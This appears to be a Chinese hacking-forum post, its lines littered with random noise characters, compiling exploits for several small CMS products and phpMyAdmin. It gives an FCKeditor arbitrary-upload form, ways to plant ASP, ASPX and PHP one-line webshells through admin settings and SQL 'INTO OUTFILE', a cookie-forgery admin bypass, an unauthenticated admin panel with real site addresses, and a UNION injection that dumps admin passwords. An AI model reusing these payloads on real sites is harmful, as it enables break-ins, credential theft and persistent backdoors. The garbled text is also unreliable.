$ b" d0 U, `+ F* b$ i6 ~跳转到网站根目录上传任意文件。2 c5 }& G& ^: s @1 X
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件, [5 T; V* G2 t' j* D, K8 L9 M
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">9 D7 G3 W, g, i% w% S
Upload a new file:<br>
/ F/ h! l5 ]2 ` R8 g8 E<input type="file" name="NewFile" size="50"><br>; j1 @& V. V( m2 U9 w1 p
<input id="btnUpload" type="submit" value="Upload">
: f& X1 ?+ G. I! x5 T1 i# g- v</form>+ [+ b) Q" S9 R2 ?4 K: v
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 \/ j$ {" p# U, h+ {: \6 i; L) _7 G4 h5 u5 v% \3 n$ y* S+ Z* t* h4 j
SDcms 后台拿webshell# H4 ?4 p; ~9 L1 [+ I# @
% T0 [( B' _5 d第一种方法:
+ F8 g1 D9 L* I0 O进入后台-->系统管理-->系统设置-->系统设置->网站名称;# o8 e3 l7 g8 }1 m, p
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx8 x. y% E) U( I! s2 B( y
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
3 e9 ~. x3 ]5 t6 T9 u6 M第二种方法:
1 J# [0 K! S& D1 X+ E' x' [进入后台-->系统管理-->系统设置-->系统设置->上传设置;1 r2 v9 M C; P9 L' Z) ]
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
# C% R' b7 B8 r/ x4 E# v; e第三种方法:# `; P# I- o) a
进入后台-->界面管理-->模板文件管理-->创建文件7 D0 u8 I4 q+ Z! n$ s
文件名写入getshell.ashx$ d) b: l; [5 X
内容写入下面内容:
1 j0 h' k% ~! m- V) G; { m8 `/====================复制下面的=========================/0 o+ }- l* ?- K3 z
<%@ WebHandler Language="C#" Class="Handler" %>
5 }8 M4 g2 [5 [using System;
4 v7 S9 B) d, W! e" a$ gusing System.Web;& y! z9 L4 e3 U: s$ d9 l0 u' t6 t
using System.IO;8 A% B- R& w9 Q' c5 q8 t* o7 e
public class Handler : IHttpHandler {
3 Y. W. @9 @$ I4 q/ |public void ProcessRequest (HttpContext context) {$ ?4 k2 o& w' y& @7 h) s; L7 N6 C
context.Response.ContentType = "text/plain";
. q) D2 ?8 ^' X* A% @StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
+ n: I; G! M( ~* cfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
8 [1 _3 _6 X! Cfile1.Flush();
) M2 z! F0 o# j1 n, E3 I3 s' l: wfile1.Close();
3 x7 M( f o+ I6 [) n}: V9 r4 j1 b8 p7 H6 q
public bool IsReusable {
$ Z6 Y7 U2 a; o$ wget {
0 r7 X, \: U0 O" ureturn false;/ o5 P+ R1 k1 P3 F) Z$ F$ h1 r# v" _) {& J
} I; ~$ U4 J. n9 `
}+ n! c5 g g9 G$ v& ?4 }' J6 Q
}1 K1 {2 ]: R6 R: X) \* n! k
/=============================================/$ {4 k6 L" D! w$ c! K
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx2 z7 h% |% U( P# j. X- T! \/ C
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接& O8 C/ I9 |0 ]( Z5 `" [$ E1 e
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, m. e, E L* {6 V
. E- L) a* i+ q" H D! t$ U& R9 AESCMS网站管理系统0day9 d% W/ t# O1 i/ a
: P9 }" H- H. g, ^! d+ N后台登陆验证是通过admin/check.asp实现的
9 i( U, n/ S8 |( P$ L( Z F* V1 G! H, z
首先我们打开http://target.com/admin/es_index.html4 Q- S8 L8 [( F; m
然后在COOKIE结尾加上+ `4 O$ ?& ?$ m) i
; ESCMS$_SP2=ES_admin=st0p;
7 j/ ]2 o5 p# ]; _: s1 b修改,然后刷新
" t! x o0 N* `进后台了嘎..
4 W' o" V4 c6 \8 A% t0 n* v. ^然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
; `* {+ ^ S+ v' ~
8 Q. f0 Q& ?! T% F; n利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.' I9 _6 A7 e1 Y; }
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
# x6 `+ G# P4 I A. u7 w5 j9 U存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..$ ~% B7 ]% |" ?: X& T4 O
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
# f( Q% ]$ ]; s I------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, [3 C, U( o5 f( G4 L
% c+ O+ k1 x8 ?宁志网站管理系统后台无验证漏洞及修复9 T& {. \' e* f1 C. [- h
7 }! z0 ]7 b$ `, h' ]6 ]
网上搜了一下,好像没有发布.如有雷同纯粹巧合!) I( G5 f$ ?' A% F
官方网站:www.ningzhi.net) H/ \. o j* C( f3 {3 U9 O
学校网站管理系统 V.2011版本
T& I- p! t8 H5 H' xhttp://down.chinaz.com/soft/29943.htm & L# I" k; u: C2 }, L
其它版本(如:政府版等),自行下载.# P; S8 ?4 z6 e' A3 { c$ S) X T! g
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~& C' v( ]# ~, K0 F
login.asp代码如下:
# J8 q7 d& \" k+ s/ k3 C<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> , a1 d8 J- T: m/ @3 \& |1 H4 G
manage.asp代码我就不帖出来了.反正也没验证./ b; l% L0 W- V! |9 M: L' n- s
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
7 o* I% ]( y, S& ]) Q9 M+ p4 z漏洞利用:
1 a$ P: J1 R2 P0 Z直接访问http://www.0855.tv/admin/manage.asp0 @0 h: z+ |1 K% V2 v9 ^
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5. N0 r6 g( Y8 h; n p8 C
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- i* Q% S0 e; ]
8 o; e/ s/ ]' W+ Q1 S+ \phpmyadmin拿shell的四种方法总结及修复
7 V6 E9 b6 T7 [2 o& G8 b; ~+ a; Q, I; n3 i
方法一:
/ K* u: v$ S, OCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );. k1 g% n' y$ w; J
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
( |; z o! J% R5 c& y nSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php'; U6 u, Y( ~+ E) ~3 q' m4 h- U6 Z
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php+ j2 u* o7 {+ X% a4 c$ u
一句话连接密码:7on
/ t$ L' H4 e G% s& q; ^: h方法二:. E8 g9 C% o! g: {1 f& C
读取文件内容: select load_file('E:/xamp/www/s.php');
* {* Z* q6 l8 j2 E7 W( f写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
7 ?# Q( i( o. G1 F5 v2 p" Z( Ecmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'' e( r' [9 W! U3 d! x! |+ x0 ~
方法三:
( {/ t0 k+ j/ b$ HJhackJ版本 PHPmyadmin拿shell
$ U# e7 Y! e4 LCreate TABLE study (cmd text NOT NULL);
4 O& N7 \7 P7 }) z4 l# X; ~$ v3 MInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
. c% _; G6 X6 y5 l5 E4 Tselect cmd from study into outfile 'E:/wamp/www/7.php';
/ x8 `. i' i* M: f6 T- i7 oDrop TABLE IF EXISTS study;0 n1 G2 {# p0 k' V
<?php eval($_POST[cmd])?>, H+ ~! X7 W5 S, f, W
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。0 f. h( S; |* u- ]2 c
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 17 q) ]; e7 R; a! {0 j. ~* W
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 17 o3 v5 k! n% v+ }- T$ r7 E R( n
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。5 j! S6 _6 p3 p, X- i
方法四:
" T- r( r' V0 S5 m; s5 T9 {select load_file('E:/xamp/www/study.php');
3 ~8 y- f! T+ {3 r4 V, p; a6 S9 gselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'5 W9 h# X. x' v1 {% k; U$ O* q
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir* ^" h' R# o5 ^% Z
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 F4 a$ t) R" _* C* ~* e! I+ D9 O9 \- j' C& Y. N* h
NO.001中学网站管理系统 Build 110628 注入漏洞9 t( L$ K( V8 I) J" @
* C( h. [/ c5 ?4 f& Q
NO.001中学网站管理系统功能模块:1 t8 x3 I6 e3 c; O+ F, P
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等1 j; f% S1 R3 b1 O- {- x; Q! m
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
6 G3 T0 t& F6 c( |/ B3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息- J+ U% {0 D2 k
4.视频图片管理:一级分类,动态添加视频或者图片等信息0 h" ?" R, g. B; r0 G
5.留言管理:对留言,修改,删除、回复等管理
; m9 r" q9 ^. `* f' ~6 P! O x6.校友频道:包括校友资料excel导出、管理等功能
: Q! a7 X8 _/ ^ v9 z7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页" y( |6 p9 M- `) B; C
默认后台:admin/login.asp$ f q8 O" ? q- ^$ l3 K0 }( [; w/ J
官方演示:http://demo.001cms.net
/ Q) P' q8 ?; Z源码下载地址:http://down.chinaz.com/soft/30187.htm
& V3 o4 ^' L1 s/ q$ ~2 x4 s8 {EXP:+ a _: N* T _ Y6 _0 j
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
- b2 [! z" z$ T, B/ H. g测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin0 q; |' d$ P% D1 l/ ^3 q
getshell:后台有备份,你懂的 B+ O7 B3 w) {: D U
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
- H& a9 ?. V$ u: Q6 E: G------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |